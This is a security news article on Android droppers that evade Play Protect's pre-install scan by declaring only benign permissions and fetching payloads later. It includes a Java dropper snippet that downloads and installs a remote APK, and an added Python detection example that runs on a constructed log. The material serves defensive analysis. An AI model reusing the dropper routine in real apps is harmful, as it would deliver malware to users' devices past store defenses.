Android droppers have evolved from niche installers for heavyweight banking Trojans into general-purpose delivery frameworks, capable of deploying even rudimentary spyware or SMS stealers.
Initially, droppers served banking malware families that required elevated Accessibility permissions to harvest credentials.
These small applications appeared innocuous at first glance, often masquerading as utility or government apps in high-risk regions. Once installed, they would fetch their true payload, request powerful permissions, and activate their malicious routines.
As defenders strengthened pre-installation scanning, threat actors began rethinking their approach.
In recent months, a surge in dropper-based campaigns targeting Asia, notably India and Southeast Asia, has emerged. Rather than relying solely on complex RATs or financial Trojans, adversaries now encapsulate simple payloads inside dropper shells.
This method exploits a critical gap in Google Play Protect's Pilot Program, which performs a pre-installation permission and API scan but allows installation to proceed if the user confirms.
ThreatFabric analysts noted that this pivot not only circumvents upfront defenses but also future-proofs operations, enabling rapid payload swaps without modifying the dropper itself.
By embedding minimalist stage-one code that carries no high-risk permissions, modern droppers slip through Pilot Program inspections undetected.
RewardDropMiner (Source – ThreatFabric)
ThreatFabric researchers identified variants such as RewardDropMiner.B, stripped of its Monero miner and fallback spyware and retaining only the dropper logic, to reduce noise and evade detection.
Apps requesting malicious permissions blocked (Source – ThreatFabric)
Once the user accepts the benign "update" prompt, a hidden routine fetches or decrypts the secondary APK; RECEIVE_SMS or BIND_NOTIFICATION permissions are requested dynamically only on the first launch of the true payload.
The impact of these campaigns is twofold: defenders lose early visibility into malicious activity, and operators maintain a persistent foothold capable of delivering arbitrary payloads.
This modularity allows threat actors to react swiftly to security updates or law enforcement takedowns by uploading new payloads behind an unchanged dropper shell hosted on their command-and-control infrastructure.
Infection Mechanism and Evasion Tactics
Delving into the infection mechanism reveals a multi-stage process designed for stealth and resiliency. The dropper's manifest declares only the INTERNET and REQUEST_INSTALL_PACKAGES permissions, avoiding any flags in Play Protect's Pilot scan.
Upon user interaction with the "update" interface, the dropper initiates an HTTPS request to a remote server:
// Imports assumed for this snippet (not shown on the page)
import java.io.File;
import java.io.FileOutputStream;
import android.content.Intent;
import androidx.core.content.FileProvider;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;

// Runs inside the dropper's Activity; the payload URL is elided on the page
String payloadUrl = "<PAYLOAD_URL_ELIDED>";
OkHttpClient client = new OkHttpClient();
Request request = new Request.Builder().url(payloadUrl).build();
Response response = client.newCall(request).execute(); // throws IOException
if (response.isSuccessful()) {
    // Stage two is written to the app's own external-files directory
    File apk = new File(getExternalFilesDir(null), "payload.apk");
    try (FileOutputStream fos = new FileOutputStream(apk)) {
        fos.write(response.body().bytes());
    }
    // Hand the APK to the system package installer through a FileProvider URI
    Intent installIntent = new Intent(Intent.ACTION_VIEW);
    installIntent.setDataAndType(
        FileProvider.getUriForFile(this, getPackageName() + ".provider", apk),
        "application/vnd.android.package-archive"
    );
    installIntent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
    startActivity(installIntent);
}
This snippet shows the dropper using only standard APIs to download the payload and prompt its installation, without triggering any high-risk permission alerts.
After installation, the payload's launcher activity requests RECEIVE_SMS and BIND_NOTIFICATION, at which point Play Protect may warn the user, but often too late, as the trust placed in the initial dropper carries over to the newly installed app.
These evasion tactics highlight a pressing need for defenders to correlate pre- and post-install scans and to monitor the behavior of side-loaded applications continuously.
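The correlation the previous sentence calls for, as an added example that is not part of the original article or ThreatFabric's tooling: a pre-install view (the permissions each package declared in its manifest) is joined against a post-install event stream, and an alert fires when a package that was side-loaded by a non-store app holding REQUEST_INSTALL_PACKAGES requests a high-risk permission shortly after install. The package names, the log format, and the use of the full BIND_NOTIFICATION_LISTENER_SERVICE name for the notification-listener permission are assumptions; the sample log is constructed.

```python
import re

# Pre-install view (constructed): permissions declared in each package's manifest.
# The dropper shell declares only the two "quiet" permissions named in the article.
MANIFEST_PERMISSIONS = {
    "com.example.updatehelper": {"INTERNET", "REQUEST_INSTALL_PACKAGES"},
    "com.android.vending": {"INTERNET", "REQUEST_INSTALL_PACKAGES"},
}
TRUSTED_INSTALLERS = {"com.android.vending"}           # store installers, not droppers
HIGH_RISK = {"RECEIVE_SMS", "READ_SMS", "BIND_NOTIFICATION_LISTENER_SERVICE"}

# Constructed post-install event stream: "<epoch> <EVENT> key=value ..."
SAMPLE_LOG = """\
100 INSTALL pkg=com.example.updatehelper installer=com.android.vending
160 INSTALL pkg=com.example.rewards installer=com.example.updatehelper
165 PERM_REQUEST pkg=com.example.rewards perm=RECEIVE_SMS
170 PERM_REQUEST pkg=com.example.rewards perm=BIND_NOTIFICATION_LISTENER_SERVICE
200 INSTALL pkg=com.example.weather installer=com.android.vending
205 PERM_REQUEST pkg=com.example.weather perm=ACCESS_FINE_LOCATION
"""
LINE_RE = re.compile(r"^(\d+) (\w+) (.*)$")

def parse(log):
    """Yield (timestamp, event, fields) for each well-formed log line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        fields = dict(kv.split("=", 1) for kv in m.group(3).split())
        yield int(m.group(1)), m.group(2), fields

def find_staged_payloads(log, window=600):
    """Return (pkg, installer, perm, seconds_since_install) for packages that were
    side-loaded by a non-store installer holding REQUEST_INSTALL_PACKAGES and then
    requested a high-risk permission within `window` seconds of installation."""
    installed_by = {}  # pkg -> (installer, install timestamp)
    alerts = []
    for ts, event, f in parse(log):
        if event == "INSTALL":
            installed_by[f["pkg"]] = (f["installer"], ts)
        elif event == "PERM_REQUEST" and f["perm"] in HIGH_RISK:
            installer, t0 = installed_by.get(f["pkg"], (None, None))
            if installer is None or installer in TRUSTED_INSTALLERS:
                continue
            declared = MANIFEST_PERMISSIONS.get(installer, set())
            if "REQUEST_INSTALL_PACKAGES" in declared and ts - t0 <= window:
                alerts.append((f["pkg"], installer, f["perm"], ts - t0))
    return alerts

if __name__ == "__main__":
    for pkg, dropper, perm, delay in find_staged_payloads(SAMPLE_LOG):
        print(f"ALERT {pkg} requested {perm} {delay}s after install by {dropper}")
```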